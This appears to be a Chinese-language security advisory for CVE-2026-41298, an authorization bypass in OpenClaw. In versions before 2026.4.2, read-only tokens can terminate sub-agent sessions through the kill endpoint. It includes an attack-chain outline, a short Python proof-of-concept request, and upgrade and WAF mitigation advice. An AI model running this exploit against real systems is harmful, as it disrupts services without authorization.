CVE-2026-41298 CVSS 5.4 中危

CVE-2026-41298 OpenClaw权限绕过漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41298

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.2之前的版本在基于身份的HTTP模式下存在权限绕过漏洞。由于POST /sessions/:sessionKey/kill端点未正确强制执行写入作用域，仅具有读取权限的攻击者可以向该端点发送请求，从而终止正在运行的子代理会话，导致授权控制失效。

技术细节

该漏洞的技术根源在于OpenClaw框架在处理会话终止请求时未严格校验调用者的权限作用域。在受影响的版本中，虽然系统启用了基于身份的HTTP模式，但/sessions/:sessionKey/kill端点仅验证了请求者的身份有效性，而未检查该请求是否具备必要的写入权限。按照安全设计，终止会话属于高敏感度的写入操作。攻击者利用低权限的只读令牌，构造特定的HTTP POST请求发送至该端点，即可绕过授权检查，强制结束活跃的子代理会话，导致业务中断或拒绝服务。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个具有只读权限的低权限账户及对应的API令牌。

STEP 2

2. 识别目标

攻击者通过枚举或其他方式获取目标子代理的sessionKey。

STEP 3

3. 发送恶意请求

攻击者使用只读令牌，向POST /sessions/:sessionKey/kill端点发送请求。

STEP 4

4. 绕过授权

服务器端由于未校验写入作用域，错误地处理了该低权限请求。

STEP 5

5. 会话终止

目标子代理会话被强制终止，导致服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: OpenClaw Authorization Bypass (CVE-2026-41298)
# Description: Terminate a session using a read-scoped token

target_url = "http://target-host/sessions/TARGET_SESSION_KEY/kill"
read_token = "READ_ONLY_USER_TOKEN"

headers = {
    "Authorization": f"Bearer {read_token}",
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful: Session terminated.")
    else:
        print(f"[-] Exploit failed: Status {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

OpenClaw < 2026.4.2

防御指南

临时缓解措施

建议立即升级至OpenClaw 2026.4.2或更高版本以修复此漏洞。若无法立即升级，应在WAF或API网关层实施严格的访问控制策略，阻止非管理员用户对/sessions/:sessionKey/kill接口的POST请求，并监控异常的会话终止日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表